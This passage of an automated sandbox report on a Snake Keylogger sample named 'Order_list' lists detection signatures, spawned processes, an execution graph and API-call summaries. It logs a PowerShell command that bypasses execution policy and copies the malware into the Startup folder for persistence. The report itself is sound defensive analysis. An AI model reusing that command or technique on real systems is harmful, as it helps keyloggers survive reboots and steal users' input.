                                                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 63%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:6
                                                                                                                          Start time:04:12:15
                                                                                                                          Start date:13/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:7
                                                                                                                          Start time:04:12:15
                                                                                                                          Start date:13/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:8
                                                                                                                          Start time:04:12:17
                                                                                                                          Start date:13/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
                                                                                                                          Imagebase:0x2b0000
                                                                                                                          File size:829'952 bytes
                                                                                                                          MD5 hash:F614CD44A2CA0676523D3F9D23AE23B2
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4142946161.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:9.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:85
                                                                                                                            Total number of Limit Nodes:6
                                                                                                                            execution_graph 15233 93ac50 15237 93ad37 15233->15237 15242 93ad48 15233->15242 15234 93ac5f 15238 93ad7c 15237->15238 15239 93ad59 15237->15239 15238->15234 15239->15238 15240 93af80 GetModuleHandleW 15239->15240 15241 93afad 15240->15241 15241->15234 15243 93ad7c 15242->15243 15244 93ad59 15242->15244 15243->15234 15244->15243 15245 93af80 GetModuleHandleW 15244->15245 15246 93afad 15245->15246 15246->15234 15257 93d620 DuplicateHandle 15258 93d6b6 15257->15258 15247 93d3d8 15248 93d41e GetCurrentProcess 15247->15248 15250 93d470 GetCurrentThread 15248->15250 15251 93d469 15248->15251 15252 93d4a6 15250->15252 15253 93d4ad GetCurrentProcess 15250->15253 15251->15250 15252->15253 15256 93d4e3 15253->15256 15254 93d50b GetCurrentThreadId 15255 93d53c 15254->15255 15256->15254 15259 934668 15260 93467a 15259->15260 15261 934686 15260->15261 15265 934779 15260->15265 15270 933e10 15261->15270 15263 9346a5 15266 93479d 15265->15266 15274 934888 15266->15274 15278 934878 15266->15278 15271 933e1b 15270->15271 15286 935c64 15271->15286 15273 936fcf 15273->15263 15276 9348af 15274->15276 15275 93498c 15276->15275 15282 934248 15276->15282 15280 9348af 15278->15280 15279 93498c 15279->15279 15280->15279 15281 934248 CreateActCtxA 15280->15281 15281->15279 15283 935918 CreateActCtxA 15282->15283 15285 9359db 15283->15285 15287 935c6f 15286->15287 15290 935c84 15287->15290 15289 937085 15289->15273 15291 935c8f 15290->15291 15294 935cb4 15291->15294 15293 937162 15293->15289 15295 935cbf 15294->15295 15298 935ce4 15295->15298 15297 937265 15297->15293 15300 935cef 15298->15300 15299 9385a9 15299->15297 15300->15299 15303 93cd00 15300->15303 15308 93cd0f 15300->15308 15304 93cd6d 15303->15304 15305 93cd98 15304->15305 15313 93cec0 15304->15313 15317 93ce7d 15304->15317 15305->15299 15309 93cd31 15308->15309 15310 93cd55 15309->15310 15311 93cec0 2 API calls 15309->15311 15312 93ce7d 2 API calls 15309->15312 15310->15299 15311->15310 15312->15310 15314 93cecd 15313->15314 15315 93cf07 15314->15315 15321 93b720 15314->15321 15315->15305 15318 93ceed 15317->15318 15319 93cf07 15318->15319 15320 93b720 2 API calls 15318->15320 15319->15305 15320->15319 15322 93b72b 15321->15322 15324 93dc18 15322->15324 15325 93d024 15322->15325 15324->15324 15326 93d02f 15325->15326 15327 935ce4 2 API calls 15326->15327 15328 93dc87 15327->15328 15329 93dc96 15328->15329 15332 93dcf0 15328->15332 15336 93dd00 15328->15336 15329->15324 15333 93dd2e 15332->15333 15334 93ddfa KiUserCallbackDispatcher 15333->15334 15335 93ddff 15333->15335 15334->15335 15337 93dd2e 15336->15337 15338 93ddfa KiUserCallbackDispatcher 15337->15338 15339 93ddff 15337->15339 15338->15339

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 294 93d3c9-93d467 GetCurrentProcess 299 93d470-93d4a4 GetCurrentThread 294->299 300 93d469-93d46f 294->300 301 93d4a6-93d4ac 299->301 302 93d4ad-93d4e1 GetCurrentProcess 299->302 300->299 301->302 303 93d4e3-93d4e9 302->303 304 93d4ea-93d505 call 93d5a8 302->304 303->304 308 93d50b-93d53a GetCurrentThreadId 304->308 309 93d543-93d5a5 308->309 310 93d53c-93d542 308->310 310->309
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0093D456
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0093D493
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0093D4D0
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0093D529
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_930000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0
                                                                                                                            • Opcode ID: d42b28dda39959359a4ff848577641b20fa9c6a9768526a66eafaa5239631b22
                                                                                                                            • Instruction ID: 528b1c40d639d23b524e485df2448a9ca0d7591b2d2f8a8464928e4c25b817a2
                                                                                                                            • Opcode Fuzzy Hash: d42b28dda39959359a4ff848577641b20fa9c6a9768526a66eafaa5239631b22
                                                                                                                            • Instruction Fuzzy Hash: A95136B09013499FDB14DFAAD548B9EBBF1AF48314F208459E019AB3A0D774A984CF65

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 317 93d3d8-93d467 GetCurrentProcess 321 93d470-93d4a4 GetCurrentThread 317->321 322 93d469-93d46f 317->322 323 93d4a6-93d4ac 321->323 324 93d4ad-93d4e1 GetCurrentProcess 321->324 322->321 323->324 325 93d4e3-93d4e9 324->325 326 93d4ea-93d505 call 93d5a8 324->326 325->326 330 93d50b-93d53a GetCurrentThreadId 326->330 331 93d543-93d5a5 330->331 332 93d53c-93d542 330->332 332->331
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0093D456
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0093D493
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0093D4D0
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0093D529
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_930000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0
                                                                                                                            • Opcode ID: 77e3b0f426f3223a88fd1740d89563336bd990e27c019afb5960340662690ab6
                                                                                                                            • Instruction ID: d07def21f3f830ce64df118228b1fd93e3a0d7a089f4004e0a1651c03347f21b
                                                                                                                            • Opcode Fuzzy Hash: 77e3b0f426f3223a88fd1740d89563336bd990e27c019afb5960340662690ab6
                                                                                                                            • Instruction Fuzzy Hash: 0E5125B0901309CFDB14DFAAD548B9EBBF5BF88314F208459E419AB3A0D774A984CF65

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 361 93ad48-93ad57 362 93ad83-93ad87 361->362 363 93ad59-93ad66 call 93a0a0 361->363 365 93ad9b-93addc 362->365 366 93ad89-93ad93 362->366 370 93ad68 363->370 371 93ad7c 363->371 372 93ade9-93adf7 365->372 373 93adde-93ade6 365->373 366->365 416 93ad6e call 93afd0 370->416 417 93ad6e call 93afe0 370->417 371->362 374 93ae1b-93ae1d 372->374 375 93adf9-93adfe 372->375 373->372 377 93ae20-93ae27 374->377 378 93ae00-93ae07 call 93a0ac 375->378 379 93ae09 375->379 376 93ad74-93ad76 376->371 380 93aeb8-93af78 376->380 383 93ae34-93ae3b 377->383 384 93ae29-93ae31 377->384 381 93ae0b-93ae19 378->381 379->381 411 93af80-93afab GetModuleHandleW 380->411 412 93af7a-93af7d 380->412 381->377 385 93ae48-93ae4a call 93a0bc 383->385 386 93ae3d-93ae45 383->386 384->383 391 93ae4f-93ae51 385->391 386->385 392 93ae53-93ae5b 391->392 393 93ae5e-93ae63 391->393 392->393 395 93ae81-93ae8e 393->395 396 93ae65-93ae6c 393->396 402 93aeb1-93aeb7 395->402 403 93ae90-93aeae 395->403 396->395 397 93ae6e-93ae7e call 93a0cc call 93a0dc 396->397 397->395 403->402 413 93afb4-93afc8 411->413 414 93afad-93afb3 411->414 412->411 414->413 416->376 417->376
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0093AF9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_930000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: 14d25c247f6aecc894f6a4619d82b7bd251802334691ccd744b01ae44593a26d
                                                                                                                            • Instruction ID: 6ccdf2365825e0611890a604aea397ded45db8da314b13338996d3a0c8672590
                                                                                                                            • Opcode Fuzzy Hash: 14d25c247f6aecc894f6a4619d82b7bd251802334691ccd744b01ae44593a26d
                                                                                                                            • Instruction Fuzzy Hash: 83712370A00B058FDB28DF2AD44575ABBF5FF88304F008A29D48ADBA50D775E949CF96

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 418 93590d-9359d9 CreateActCtxA 420 9359e2-935a3c 418->420 421 9359db-9359e1 418->421 428 935a4b-935a4f 420->428 429 935a3e-935a41 420->429 421->420 430 935a51-935a5d 428->430 431 935a60 428->431 429->428 430->431 433 935a61 431->433 433->433
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 009359C9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_930000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 531b56781b024167310c303170b445d2e0b4dc84c1dae7021092422078680378
                                                                                                                            • Instruction ID: 978fd1498d0759d109ddfaf48823fdb30346836119b45eae0582e564ad459cbf
                                                                                                                            • Opcode Fuzzy Hash: 531b56781b024167310c303170b445d2e0b4dc84c1dae7021092422078680378
                                                                                                                            • Instruction Fuzzy Hash: FA41B0B0C00619CBDB24CFA9C884BDEBBB5BF49304F24816AD449AB255DB756946CF90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 434 934248-9359d9 CreateActCtxA 437 9359e2-935a3c 434->437 438 9359db-9359e1 434->438 445 935a4b-935a4f 437->445 446 935a3e-935a41 437->446 438->437 447 935a51-935a5d 445->447 448 935a60 445->448 446->445 447->448 450 935a61 448->450 450->450
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 009359C9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_930000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 4da27dcf09c251ddccdf2bded95b3704b6765fc11b1d9b4c3b3dc3152ae934b6
                                                                                                                            • Instruction ID: 596f054d0e77b601972b984d28a4b7db325172a61d8f76a1bfbbdf7661251a14
                                                                                                                            • Opcode Fuzzy Hash: 4da27dcf09c251ddccdf2bded95b3704b6765fc11b1d9b4c3b3dc3152ae934b6
                                                                                                                            • Instruction Fuzzy Hash: FB41DFB0C00719CBDB24CFA9C884B9EBBF9BF48304F24816AD409AB255DB756985CF90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 451 93d619-93d61e 452 93d620-93d6b4 DuplicateHandle 451->452 453 93d6b6-93d6bc 452->453 454 93d6bd-93d6da 452->454 453->454
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0093D6A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_930000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 5c0224866f3003f3f4514a8c2efa40536fe73367e771af9a862fbca8e327d3a8
                                                                                                                            • Instruction ID: 52309b08bda4e052490075e08cd9a8a8ae837996cc77f8279893ac397655a5b9
                                                                                                                            • Opcode Fuzzy Hash: 5c0224866f3003f3f4514a8c2efa40536fe73367e771af9a862fbca8e327d3a8
                                                                                                                            • Instruction Fuzzy Hash: 1221E6B5901259DFDB10CF9AD584ADEFBF4EB48324F14801AE958A7311C374A940CF65

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 457 93d620-93d6b4 DuplicateHandle 458 93d6b6-93d6bc 457->458 459 93d6bd-93d6da 457->459 458->459
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0093D6A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_930000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 39addf542341b622f8f6b9d57f3da64766ebe2f669484077b9480da719b5e402
                                                                                                                            • Instruction ID: eac4b7c7b4fa7dff21488b84464f6c65d432b4a3fe0018a4bf796a7f6dd6be46
                                                                                                                            • Opcode Fuzzy Hash: 39addf542341b622f8f6b9d57f3da64766ebe2f669484077b9480da719b5e402
                                                                                                                            • Instruction Fuzzy Hash: 1121E4B59002189FDB10CFAAD584ADEFBF8EB48310F14801AE958A7310C374A940CFA5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 462 93af38-93af78 463 93af80-93afab GetModuleHandleW 462->463 464 93af7a-93af7d 462->464 465 93afb4-93afc8 463->465 466 93afad-93afb3 463->466 464->463 466->465
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0093AF9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_930000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: 2b1b38e67694affda61af8f9970b0b0a3b4836077b82188da94d71828b169814
                                                                                                                            • Instruction ID: 1cd9ac1e808ef6a7a0e2581fa39538a5bddade122e37d5f38359552b6574cf91
                                                                                                                            • Opcode Fuzzy Hash: 2b1b38e67694affda61af8f9970b0b0a3b4836077b82188da94d71828b169814
                                                                                                                            • Instruction Fuzzy Hash: 1811E0B5C007498FDB10CF9AD544ADEFBF8AB88324F10842AD859A7210C379A545CFA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4136871184.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_8dd000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 509b39dd0b78b4375a37894a113ce7b65791dbf857d2302cf97a83f57f179117
                                                                                                                            • Instruction ID: cbb8ffa94c8cbeebb4be1282baccd179ca6c172da3cfa13083d17b2124e36808
                                                                                                                            • Opcode Fuzzy Hash: 509b39dd0b78b4375a37894a113ce7b65791dbf857d2302cf97a83f57f179117
                                                                                                                            • Instruction Fuzzy Hash: 13212871500304DFDB05DF14D9C0B26BF66FB94324F20C26AD9098B356C336E856C6A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137061923.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_8ed000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e786e0b96b3bcdefb41e36a9f8e086f1dffcd74e28347fc6399ece7ccd87c35f
                                                                                                                            • Instruction ID: 4c545bed4f601ea1d26976df8b51f70235ccc3f4dad90b1a8b88dad84f2419e1
                                                                                                                            • Opcode Fuzzy Hash: e786e0b96b3bcdefb41e36a9f8e086f1dffcd74e28347fc6399ece7ccd87c35f
                                                                                                                            • Instruction Fuzzy Hash: DA21F271604784DFCB14DF15D984B26BBA5FB85318F28C569D80A8B296C33AD84BCA61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137061923.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_8ed000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 65478f93c15353dc7c934b7596a9f86409357e0ce3ec94651c3dcbc85942ef29
                                                                                                                            • Instruction ID: a184dca4305306c37e1936ad98fa7f9e8e2cdfda0aba4437f1e74041562e6a97
                                                                                                                            • Opcode Fuzzy Hash: 65478f93c15353dc7c934b7596a9f86409357e0ce3ec94651c3dcbc85942ef29
                                                                                                                            • Instruction Fuzzy Hash: 33215B75504384DFDB00DF15D5C0B2AFB65FB85324F24C56DD8498B382D37AD84ACAA2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137061923.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_8ed000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 800ac14a21edcc82eddb32aa5a2f8d9aaec8509955ac67b1f4cae810dea4b44a
                                                                                                                            • Instruction ID: dba6c656d7d51d0370f94f229fc2b313db7e77eba9317e2d61f349a6ebd86e97
                                                                                                                            • Opcode Fuzzy Hash: 800ac14a21edcc82eddb32aa5a2f8d9aaec8509955ac67b1f4cae810dea4b44a
                                                                                                                            • Instruction Fuzzy Hash: 49214F755087809FCB02CF14D994711BF71FB56314F28C5EAD8498F2A6C33A985ACB62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4136871184.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_8dd000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                            • Instruction ID: ed47b0e984a837c9ca66dda3fac50ceca58a2178c3d4e58500f4c0d98ce95fe4
                                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                            • Instruction Fuzzy Hash: 4C11DF72404340DFCB12CF00D5C4B16BF72FB94324F24C2AAD8094B256C33AE85ACBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137061923.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_8ed000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                            • Instruction ID: 9e355c573f8dd9c9f0cb36b3cc8baa0d2cc88482a45cc2c1f1515d0f3840c979
                                                                                                                            • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                            • Instruction Fuzzy Hash: D9119075504380CFDB11CF14D5C4B19FB61FB85324F24C6AAD8494B756C33AD80ACB92
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_930000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2a1efe08a9fc84bb7d4849bc236cd48ea95214d1679eecd13abd50f7a7810f41
                                                                                                                            • Instruction ID: a07fff05e9f0521bea9e48ea24adb94ee4fe5b2c32c3000fd18dcee70d02f54d
                                                                                                                            • Opcode Fuzzy Hash: 2a1efe08a9fc84bb7d4849bc236cd48ea95214d1679eecd13abd50f7a7810f41
                                                                                                                            • Instruction Fuzzy Hash: 8EA19036E002098FCF19DFB5C8505AEBBB6FF85300B15457AE806AB262DB31E916CF40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000001.00000002.1700196729.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_1_2_48f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1be81fc4653e918a8d9861a1d2241aecd1c577c947c19538afd455d1d57cff0b
                                                                                                                            • Instruction ID: fe6e866896b62afd77ae4f776c1ac3ecbc206b2be81f61aaadc23eb3d311ed29
                                                                                                                            • Opcode Fuzzy Hash: 1be81fc4653e918a8d9861a1d2241aecd1c577c947c19538afd455d1d57cff0b
                                                                                                                            • Instruction Fuzzy Hash: 9641A434A05248DFCB05DFA4D8809ADFBB2FF89300F2585A5E544AB362D735AD46DB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000001.00000002.1700196729.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_1_2_48f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fc9328db78b1732a6fabceaa9d408392b8ed8de7e0bbc32c0d2e4d4f06f9422e
                                                                                                                            • Instruction ID: 9d899f4f049bfd46414a7741ba0906666e6ab147d495bba8ad4222475157a705
                                                                                                                            • Opcode Fuzzy Hash: fc9328db78b1732a6fabceaa9d408392b8ed8de7e0bbc32c0d2e4d4f06f9422e
                                                                                                                            • Instruction Fuzzy Hash: 6F916B74A002458FCB15CF58C8989AAFBB1FF48310B248A99D915EB365D736FC91CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000001.00000002.1700196729.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_1_2_48f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7fd790a36ef1039221789e7031d652e0485b8e275034af23192745364992fc2e
                                                                                                                            • Instruction ID: e4641da421929c2abfef33032ab15beb63459195ebf68005ac8fbdba64b29c79
                                                                                                                            • Opcode Fuzzy Hash: 7fd790a36ef1039221789e7031d652e0485b8e275034af23192745364992fc2e
                                                                                                                            • Instruction Fuzzy Hash: 43412AB4A006059FCB05CF58C9989AAFBB1FF48310B158A99D915AB369C736FC51CFA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000001.00000002.1699744980.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_1_2_306d000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cfb3b82bd5dac6ff74abcdee7de046ee81cc9e1480715a5fb8410e4f3c9001ab
                                                                                                                            • Instruction ID: 0ebbab4663dca8e29ed534361e8924bd6b8a50c50076c8a8e0d9f969eebcda6b
                                                                                                                            • Opcode Fuzzy Hash: cfb3b82bd5dac6ff74abcdee7de046ee81cc9e1480715a5fb8410e4f3c9001ab
                                                                                                                            • Instruction Fuzzy Hash: 5401216110E3C05ED7128B25C894B52BFB8EF43224F1D81CBD8848F197C2699844D772
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000001.00000002.1699744980.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_1_2_306d000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
